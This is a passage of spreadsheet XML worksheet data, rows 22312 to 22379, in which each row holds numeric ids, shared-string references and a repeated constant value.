      <c r="B22312" s="2">
        <v>4.2729062E7</v>
      </c>
      <c r="C22312" s="2" t="s">
        <v>21549</v>
      </c>
      <c r="D22312" s="2">
        <v>1.0</v>
      </c>
      <c r="E22312" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22312" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22313" ht="15.75" customHeight="1">
      <c r="A22313" s="1">
        <v>4591.0</v>
      </c>
      <c r="B22313" s="2">
        <v>4.28034E7</v>
      </c>
      <c r="C22313" s="2" t="s">
        <v>21550</v>
      </c>
      <c r="D22313" s="2">
        <v>1.0</v>
      </c>
      <c r="E22313" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22313" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22314" ht="15.75" customHeight="1">
      <c r="A22314" s="1">
        <v>4726.0</v>
      </c>
      <c r="B22314" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C22314" s="2" t="s">
        <v>21551</v>
      </c>
      <c r="D22314" s="2">
        <v>1.0</v>
      </c>
      <c r="E22314" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22314" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22315" ht="15.75" customHeight="1">
      <c r="A22315" s="1">
        <v>4732.0</v>
      </c>
      <c r="B22315" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C22315" s="2" t="s">
        <v>21430</v>
      </c>
      <c r="D22315" s="2">
        <v>1.0</v>
      </c>
      <c r="E22315" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22315" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22316" ht="15.75" customHeight="1">
      <c r="A22316" s="1">
        <v>4983.0</v>
      </c>
      <c r="B22316" s="2">
        <v>4.4123452E7</v>
      </c>
      <c r="C22316" s="2" t="s">
        <v>21552</v>
      </c>
      <c r="D22316" s="2">
        <v>1.0</v>
      </c>
      <c r="E22316" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22316" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22317" ht="15.75" customHeight="1">
      <c r="A22317" s="1">
        <v>5078.0</v>
      </c>
      <c r="B22317" s="2">
        <v>4.4449297E7</v>
      </c>
      <c r="C22317" s="2" t="s">
        <v>21553</v>
      </c>
      <c r="D22317" s="2">
        <v>1.0</v>
      </c>
      <c r="E22317" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22317" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22318" ht="15.75" customHeight="1">
      <c r="A22318" s="1">
        <v>5084.0</v>
      </c>
      <c r="B22318" s="2">
        <v>4.4475486E7</v>
      </c>
      <c r="C22318" s="2" t="s">
        <v>21554</v>
      </c>
      <c r="D22318" s="2">
        <v>1.0</v>
      </c>
      <c r="E22318" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22318" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22319" ht="15.75" customHeight="1">
      <c r="A22319" s="1">
        <v>5183.0</v>
      </c>
      <c r="B22319" s="2">
        <v>4.4782478E7</v>
      </c>
      <c r="C22319" s="2" t="s">
        <v>21555</v>
      </c>
      <c r="D22319" s="2">
        <v>1.0</v>
      </c>
      <c r="E22319" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22319" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22320" ht="15.75" customHeight="1">
      <c r="A22320" s="1">
        <v>5222.0</v>
      </c>
      <c r="B22320" s="2">
        <v>4.4967878E7</v>
      </c>
      <c r="C22320" s="2" t="s">
        <v>21556</v>
      </c>
      <c r="D22320" s="2">
        <v>1.0</v>
      </c>
      <c r="E22320" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22320" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22321" ht="15.75" customHeight="1">
      <c r="A22321" s="1">
        <v>5332.0</v>
      </c>
      <c r="B22321" s="2">
        <v>4.5317798E7</v>
      </c>
      <c r="C22321" s="2" t="s">
        <v>21557</v>
      </c>
      <c r="D22321" s="2">
        <v>1.0</v>
      </c>
      <c r="E22321" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22321" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22322" ht="15.75" customHeight="1">
      <c r="A22322" s="1">
        <v>5569.0</v>
      </c>
      <c r="B22322" s="2">
        <v>4.6021458E7</v>
      </c>
      <c r="C22322" s="2" t="s">
        <v>21558</v>
      </c>
      <c r="D22322" s="2">
        <v>1.0</v>
      </c>
      <c r="E22322" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22322" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22323" ht="15.75" customHeight="1">
      <c r="A22323" s="1">
        <v>5595.0</v>
      </c>
      <c r="B22323" s="2">
        <v>4.6123243E7</v>
      </c>
      <c r="C22323" s="2" t="s">
        <v>21559</v>
      </c>
      <c r="D22323" s="2">
        <v>1.0</v>
      </c>
      <c r="E22323" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22323" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22324" ht="15.75" customHeight="1">
      <c r="A22324" s="1">
        <v>5646.0</v>
      </c>
      <c r="B22324" s="2">
        <v>4626911.0</v>
      </c>
      <c r="C22324" s="2" t="s">
        <v>21560</v>
      </c>
      <c r="D22324" s="2">
        <v>1.0</v>
      </c>
      <c r="E22324" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22324" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22325" ht="15.75" customHeight="1">
      <c r="A22325" s="1">
        <v>5676.0</v>
      </c>
      <c r="B22325" s="2">
        <v>4.6360355E7</v>
      </c>
      <c r="C22325" s="2" t="s">
        <v>21561</v>
      </c>
      <c r="D22325" s="2">
        <v>1.0</v>
      </c>
      <c r="E22325" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22325" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22326" ht="15.75" customHeight="1">
      <c r="A22326" s="1">
        <v>5720.0</v>
      </c>
      <c r="B22326" s="2">
        <v>4.6589893E7</v>
      </c>
      <c r="C22326" s="2" t="s">
        <v>21562</v>
      </c>
      <c r="D22326" s="2">
        <v>1.0</v>
      </c>
      <c r="E22326" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22326" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22327" ht="15.75" customHeight="1">
      <c r="A22327" s="1">
        <v>5877.0</v>
      </c>
      <c r="B22327" s="2">
        <v>4.7068564E7</v>
      </c>
      <c r="C22327" s="2" t="s">
        <v>21563</v>
      </c>
      <c r="D22327" s="2">
        <v>1.0</v>
      </c>
      <c r="E22327" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22327" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22328" ht="15.75" customHeight="1">
      <c r="A22328" s="1">
        <v>6064.0</v>
      </c>
      <c r="B22328" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C22328" s="2" t="s">
        <v>21564</v>
      </c>
      <c r="D22328" s="2">
        <v>1.0</v>
      </c>
      <c r="E22328" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22328" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22329" ht="15.75" customHeight="1">
      <c r="A22329" s="1">
        <v>6156.0</v>
      </c>
      <c r="B22329" s="2">
        <v>4.7857179E7</v>
      </c>
      <c r="C22329" s="2" t="s">
        <v>21565</v>
      </c>
      <c r="D22329" s="2">
        <v>1.0</v>
      </c>
      <c r="E22329" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22329" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22330" ht="15.75" customHeight="1">
      <c r="A22330" s="1">
        <v>6253.0</v>
      </c>
      <c r="B22330" s="2">
        <v>4.8105197E7</v>
      </c>
      <c r="C22330" s="2" t="s">
        <v>21566</v>
      </c>
      <c r="D22330" s="2">
        <v>1.0</v>
      </c>
      <c r="E22330" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22330" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22331" ht="15.75" customHeight="1">
      <c r="A22331" s="1">
        <v>6344.0</v>
      </c>
      <c r="B22331" s="2">
        <v>4.8311723E7</v>
      </c>
      <c r="C22331" s="2" t="s">
        <v>21567</v>
      </c>
      <c r="D22331" s="2">
        <v>1.0</v>
      </c>
      <c r="E22331" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22331" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22332" ht="15.75" customHeight="1">
      <c r="A22332" s="1">
        <v>6474.0</v>
      </c>
      <c r="B22332" s="2">
        <v>4.866475E7</v>
      </c>
      <c r="C22332" s="2" t="s">
        <v>21568</v>
      </c>
      <c r="D22332" s="2">
        <v>1.0</v>
      </c>
      <c r="E22332" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22332" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22333" ht="15.75" customHeight="1">
      <c r="A22333" s="1">
        <v>6570.0</v>
      </c>
      <c r="B22333" s="2">
        <v>4.890865E7</v>
      </c>
      <c r="C22333" s="2" t="s">
        <v>21569</v>
      </c>
      <c r="D22333" s="2">
        <v>1.0</v>
      </c>
      <c r="E22333" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22333" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22334" ht="15.75" customHeight="1">
      <c r="A22334" s="1">
        <v>6964.0</v>
      </c>
      <c r="B22334" s="2">
        <v>4.998173E7</v>
      </c>
      <c r="C22334" s="2" t="s">
        <v>21570</v>
      </c>
      <c r="D22334" s="2">
        <v>1.0</v>
      </c>
      <c r="E22334" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22334" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22335" ht="15.75" customHeight="1">
      <c r="A22335" s="1">
        <v>7122.0</v>
      </c>
      <c r="B22335" s="2">
        <v>5.0414315E7</v>
      </c>
      <c r="C22335" s="2" t="s">
        <v>21571</v>
      </c>
      <c r="D22335" s="2">
        <v>1.0</v>
      </c>
      <c r="E22335" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22335" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22336" ht="15.75" customHeight="1">
      <c r="A22336" s="1">
        <v>7129.0</v>
      </c>
      <c r="B22336" s="2">
        <v>5.042755E7</v>
      </c>
      <c r="C22336" s="2" t="s">
        <v>21572</v>
      </c>
      <c r="D22336" s="2">
        <v>1.0</v>
      </c>
      <c r="E22336" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22336" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22337" ht="15.75" customHeight="1">
      <c r="A22337" s="1">
        <v>7148.0</v>
      </c>
      <c r="B22337" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C22337" s="2" t="s">
        <v>21573</v>
      </c>
      <c r="D22337" s="2">
        <v>1.0</v>
      </c>
      <c r="E22337" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22337" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22338" ht="15.75" customHeight="1">
      <c r="A22338" s="1">
        <v>7223.0</v>
      </c>
      <c r="B22338" s="2">
        <v>5.0655546E7</v>
      </c>
      <c r="C22338" s="2" t="s">
        <v>21574</v>
      </c>
      <c r="D22338" s="2">
        <v>1.0</v>
      </c>
      <c r="E22338" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22338" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22339" ht="15.75" customHeight="1">
      <c r="A22339" s="1">
        <v>7498.0</v>
      </c>
      <c r="B22339" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C22339" s="2" t="s">
        <v>21575</v>
      </c>
      <c r="D22339" s="2">
        <v>1.0</v>
      </c>
      <c r="E22339" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22339" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22340" ht="15.75" customHeight="1">
      <c r="A22340" s="1">
        <v>7594.0</v>
      </c>
      <c r="B22340" s="2">
        <v>5.1609122E7</v>
      </c>
      <c r="C22340" s="2" t="s">
        <v>21576</v>
      </c>
      <c r="D22340" s="2">
        <v>1.0</v>
      </c>
      <c r="E22340" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22340" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22341" ht="15.75" customHeight="1">
      <c r="A22341" s="1">
        <v>7633.0</v>
      </c>
      <c r="B22341" s="2">
        <v>5.1764904E7</v>
      </c>
      <c r="C22341" s="2" t="s">
        <v>21577</v>
      </c>
      <c r="D22341" s="2">
        <v>1.0</v>
      </c>
      <c r="E22341" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22341" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22342" ht="15.75" customHeight="1">
      <c r="A22342" s="1">
        <v>7713.0</v>
      </c>
      <c r="B22342" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C22342" s="2" t="s">
        <v>21578</v>
      </c>
      <c r="D22342" s="2">
        <v>1.0</v>
      </c>
      <c r="E22342" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22342" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22343" ht="15.75" customHeight="1">
      <c r="A22343" s="1">
        <v>8010.0</v>
      </c>
      <c r="B22343" s="2">
        <v>5.2786827E7</v>
      </c>
      <c r="C22343" s="2" t="s">
        <v>21579</v>
      </c>
      <c r="D22343" s="2">
        <v>1.0</v>
      </c>
      <c r="E22343" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22343" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22344" ht="15.75" customHeight="1">
      <c r="A22344" s="1">
        <v>8323.0</v>
      </c>
      <c r="B22344" s="2">
        <v>5.3643617E7</v>
      </c>
      <c r="C22344" s="2" t="s">
        <v>21580</v>
      </c>
      <c r="D22344" s="2">
        <v>1.0</v>
      </c>
      <c r="E22344" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22344" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22345" ht="15.75" customHeight="1">
      <c r="A22345" s="1">
        <v>8335.0</v>
      </c>
      <c r="B22345" s="2">
        <v>5.3683816E7</v>
      </c>
      <c r="C22345" s="2" t="s">
        <v>21581</v>
      </c>
      <c r="D22345" s="2">
        <v>1.0</v>
      </c>
      <c r="E22345" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22345" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22346" ht="15.75" customHeight="1">
      <c r="A22346" s="1">
        <v>8349.0</v>
      </c>
      <c r="B22346" s="2">
        <v>5.3742162E7</v>
      </c>
      <c r="C22346" s="2" t="s">
        <v>21582</v>
      </c>
      <c r="D22346" s="2">
        <v>1.0</v>
      </c>
      <c r="E22346" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22346" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22347" ht="15.75" customHeight="1">
      <c r="A22347" s="1">
        <v>8389.0</v>
      </c>
      <c r="B22347" s="2">
        <v>5.3845713E7</v>
      </c>
      <c r="C22347" s="2" t="s">
        <v>21583</v>
      </c>
      <c r="D22347" s="2">
        <v>1.0</v>
      </c>
      <c r="E22347" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22347" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22348" ht="15.75" customHeight="1">
      <c r="A22348" s="1">
        <v>8396.0</v>
      </c>
      <c r="B22348" s="2">
        <v>5.3856019E7</v>
      </c>
      <c r="C22348" s="2" t="s">
        <v>21584</v>
      </c>
      <c r="D22348" s="2">
        <v>1.0</v>
      </c>
      <c r="E22348" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22348" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22349" ht="15.75" customHeight="1">
      <c r="A22349" s="1">
        <v>8405.0</v>
      </c>
      <c r="B22349" s="2">
        <v>5.3882488E7</v>
      </c>
      <c r="C22349" s="2" t="s">
        <v>21585</v>
      </c>
      <c r="D22349" s="2">
        <v>1.0</v>
      </c>
      <c r="E22349" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22349" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22350" ht="15.75" customHeight="1">
      <c r="A22350" s="1">
        <v>8406.0</v>
      </c>
      <c r="B22350" s="2">
        <v>5.3886475E7</v>
      </c>
      <c r="C22350" s="2" t="s">
        <v>21586</v>
      </c>
      <c r="D22350" s="2">
        <v>1.0</v>
      </c>
      <c r="E22350" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22350" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22351" ht="15.75" customHeight="1">
      <c r="A22351" s="1">
        <v>8434.0</v>
      </c>
      <c r="B22351" s="2">
        <v>5.3946286E7</v>
      </c>
      <c r="C22351" s="2" t="s">
        <v>21587</v>
      </c>
      <c r="D22351" s="2">
        <v>1.0</v>
      </c>
      <c r="E22351" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22351" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22352" ht="15.75" customHeight="1">
      <c r="A22352" s="1">
        <v>8506.0</v>
      </c>
      <c r="B22352" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C22352" s="2" t="s">
        <v>21588</v>
      </c>
      <c r="D22352" s="2">
        <v>1.0</v>
      </c>
      <c r="E22352" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22352" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22353" ht="15.75" customHeight="1">
      <c r="A22353" s="1">
        <v>8589.0</v>
      </c>
      <c r="B22353" s="2">
        <v>5.423283E7</v>
      </c>
      <c r="C22353" s="2" t="s">
        <v>21589</v>
      </c>
      <c r="D22353" s="2">
        <v>1.0</v>
      </c>
      <c r="E22353" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22353" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22354" ht="15.75" customHeight="1">
      <c r="A22354" s="1">
        <v>8780.0</v>
      </c>
      <c r="B22354" s="2">
        <v>5.4587451E7</v>
      </c>
      <c r="C22354" s="2" t="s">
        <v>21590</v>
      </c>
      <c r="D22354" s="2">
        <v>1.0</v>
      </c>
      <c r="E22354" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22354" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22355" ht="15.75" customHeight="1">
      <c r="A22355" s="1">
        <v>8781.0</v>
      </c>
      <c r="B22355" s="2">
        <v>5.4587451E7</v>
      </c>
      <c r="C22355" s="2" t="s">
        <v>21590</v>
      </c>
      <c r="D22355" s="2">
        <v>1.0</v>
      </c>
      <c r="E22355" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22355" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22356" ht="15.75" customHeight="1">
      <c r="A22356" s="1">
        <v>8782.0</v>
      </c>
      <c r="B22356" s="2">
        <v>5.4587451E7</v>
      </c>
      <c r="C22356" s="2" t="s">
        <v>21590</v>
      </c>
      <c r="D22356" s="2">
        <v>1.0</v>
      </c>
      <c r="E22356" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22356" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22357" ht="15.75" customHeight="1">
      <c r="A22357" s="1">
        <v>8952.0</v>
      </c>
      <c r="B22357" s="2">
        <v>5.4924733E7</v>
      </c>
      <c r="C22357" s="2" t="s">
        <v>21591</v>
      </c>
      <c r="D22357" s="2">
        <v>1.0</v>
      </c>
      <c r="E22357" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22357" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22358" ht="15.75" customHeight="1">
      <c r="A22358" s="1">
        <v>9187.0</v>
      </c>
      <c r="B22358" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C22358" s="2" t="s">
        <v>21592</v>
      </c>
      <c r="D22358" s="2">
        <v>1.0</v>
      </c>
      <c r="E22358" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22358" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22359" ht="15.75" customHeight="1">
      <c r="A22359" s="1">
        <v>9222.0</v>
      </c>
      <c r="B22359" s="2">
        <v>5.5434233E7</v>
      </c>
      <c r="C22359" s="2" t="s">
        <v>21593</v>
      </c>
      <c r="D22359" s="2">
        <v>1.0</v>
      </c>
      <c r="E22359" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22359" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22360" ht="15.75" customHeight="1">
      <c r="A22360" s="1">
        <v>9250.0</v>
      </c>
      <c r="B22360" s="2">
        <v>5.5473488E7</v>
      </c>
      <c r="C22360" s="2" t="s">
        <v>21594</v>
      </c>
      <c r="D22360" s="2">
        <v>1.0</v>
      </c>
      <c r="E22360" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22360" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22361" ht="15.75" customHeight="1">
      <c r="A22361" s="1">
        <v>9360.0</v>
      </c>
      <c r="B22361" s="2">
        <v>5.5678451E7</v>
      </c>
      <c r="C22361" s="2" t="s">
        <v>21595</v>
      </c>
      <c r="D22361" s="2">
        <v>1.0</v>
      </c>
      <c r="E22361" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22361" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22362" ht="15.75" customHeight="1">
      <c r="A22362" s="1">
        <v>9381.0</v>
      </c>
      <c r="B22362" s="2">
        <v>5.5727534E7</v>
      </c>
      <c r="C22362" s="2" t="s">
        <v>21596</v>
      </c>
      <c r="D22362" s="2">
        <v>1.0</v>
      </c>
      <c r="E22362" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22362" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22363" ht="15.75" customHeight="1">
      <c r="A22363" s="1">
        <v>9427.0</v>
      </c>
      <c r="B22363" s="2">
        <v>5.5795084E7</v>
      </c>
      <c r="C22363" s="2" t="s">
        <v>21597</v>
      </c>
      <c r="D22363" s="2">
        <v>1.0</v>
      </c>
      <c r="E22363" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22363" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22364" ht="15.75" customHeight="1">
      <c r="A22364" s="1">
        <v>9441.0</v>
      </c>
      <c r="B22364" s="2">
        <v>5.5815456E7</v>
      </c>
      <c r="C22364" s="2" t="s">
        <v>21598</v>
      </c>
      <c r="D22364" s="2">
        <v>1.0</v>
      </c>
      <c r="E22364" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22364" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22365" ht="15.75" customHeight="1">
      <c r="A22365" s="1">
        <v>9564.0</v>
      </c>
      <c r="B22365" s="2">
        <v>5.6048578E7</v>
      </c>
      <c r="C22365" s="2" t="s">
        <v>21599</v>
      </c>
      <c r="D22365" s="2">
        <v>1.0</v>
      </c>
      <c r="E22365" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22365" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22366" ht="15.75" customHeight="1">
      <c r="A22366" s="1">
        <v>9692.0</v>
      </c>
      <c r="B22366" s="2">
        <v>5.6352137E7</v>
      </c>
      <c r="C22366" s="2" t="s">
        <v>21600</v>
      </c>
      <c r="D22366" s="2">
        <v>1.0</v>
      </c>
      <c r="E22366" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22366" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22367" ht="15.75" customHeight="1">
      <c r="A22367" s="1">
        <v>9748.0</v>
      </c>
      <c r="B22367" s="2">
        <v>5.6481757E7</v>
      </c>
      <c r="C22367" s="2" t="s">
        <v>21601</v>
      </c>
      <c r="D22367" s="2">
        <v>1.0</v>
      </c>
      <c r="E22367" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22367" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22368" ht="15.75" customHeight="1">
      <c r="A22368" s="1">
        <v>9757.0</v>
      </c>
      <c r="B22368" s="2">
        <v>5.6491674E7</v>
      </c>
      <c r="C22368" s="2" t="s">
        <v>21602</v>
      </c>
      <c r="D22368" s="2">
        <v>1.0</v>
      </c>
      <c r="E22368" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22368" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22369" ht="15.75" customHeight="1">
      <c r="A22369" s="1">
        <v>9765.0</v>
      </c>
      <c r="B22369" s="2">
        <v>5.6499611E7</v>
      </c>
      <c r="C22369" s="2" t="s">
        <v>21603</v>
      </c>
      <c r="D22369" s="2">
        <v>1.0</v>
      </c>
      <c r="E22369" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22369" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22370" ht="15.75" customHeight="1">
      <c r="A22370" s="1">
        <v>9791.0</v>
      </c>
      <c r="B22370" s="2">
        <v>5.6526962E7</v>
      </c>
      <c r="C22370" s="2" t="s">
        <v>21604</v>
      </c>
      <c r="D22370" s="2">
        <v>1.0</v>
      </c>
      <c r="E22370" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22370" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22371" ht="15.75" customHeight="1">
      <c r="A22371" s="1">
        <v>9818.0</v>
      </c>
      <c r="B22371" s="2">
        <v>5.6617627E7</v>
      </c>
      <c r="C22371" s="2" t="s">
        <v>21605</v>
      </c>
      <c r="D22371" s="2">
        <v>1.0</v>
      </c>
      <c r="E22371" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22371" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22372" ht="15.75" customHeight="1">
      <c r="A22372" s="1">
        <v>9934.0</v>
      </c>
      <c r="B22372" s="2">
        <v>5.6835805E7</v>
      </c>
      <c r="C22372" s="2" t="s">
        <v>21606</v>
      </c>
      <c r="D22372" s="2">
        <v>1.0</v>
      </c>
      <c r="E22372" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22372" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22373" ht="15.75" customHeight="1">
      <c r="A22373" s="1">
        <v>9956.0</v>
      </c>
      <c r="B22373" s="2">
        <v>5.6912836E7</v>
      </c>
      <c r="C22373" s="2" t="s">
        <v>21607</v>
      </c>
      <c r="D22373" s="2">
        <v>1.0</v>
      </c>
      <c r="E22373" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22373" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22374" ht="15.75" customHeight="1">
      <c r="A22374" s="1">
        <v>9969.0</v>
      </c>
      <c r="B22374" s="2">
        <v>5.6941682E7</v>
      </c>
      <c r="C22374" s="2" t="s">
        <v>21608</v>
      </c>
      <c r="D22374" s="2">
        <v>1.0</v>
      </c>
      <c r="E22374" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22374" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22375" ht="15.75" customHeight="1">
      <c r="A22375" s="1">
        <v>10010.0</v>
      </c>
      <c r="B22375" s="2">
        <v>5.7017137E7</v>
      </c>
      <c r="C22375" s="2" t="s">
        <v>21609</v>
      </c>
      <c r="D22375" s="2">
        <v>1.0</v>
      </c>
      <c r="E22375" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22375" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22376" ht="15.75" customHeight="1">
      <c r="A22376" s="1">
        <v>10058.0</v>
      </c>
      <c r="B22376" s="2">
        <v>5.7121611E7</v>
      </c>
      <c r="C22376" s="2" t="s">
        <v>21610</v>
      </c>
      <c r="D22376" s="2">
        <v>1.0</v>
      </c>
      <c r="E22376" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22376" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22377" ht="15.75" customHeight="1">
      <c r="A22377" s="1">
        <v>10073.0</v>
      </c>
      <c r="B22377" s="2">
        <v>5.7147389E7</v>
      </c>
      <c r="C22377" s="2" t="s">
        <v>21611</v>
      </c>
      <c r="D22377" s="2">
        <v>1.0</v>
      </c>
      <c r="E22377" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22377" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22378" ht="15.75" customHeight="1">
      <c r="A22378" s="1">
        <v>10126.0</v>
      </c>
      <c r="B22378" s="2">
        <v>5.7278991E7</v>
      </c>
      <c r="C22378" s="2" t="s">
        <v>21612</v>
      </c>
      <c r="D22378" s="2">
        <v>1.0</v>
      </c>
      <c r="E22378" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22378" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22379" ht="15.75" customHeight="1">
      <c r="A22379" s="1">
        <v>10267.0</v>
      </c>
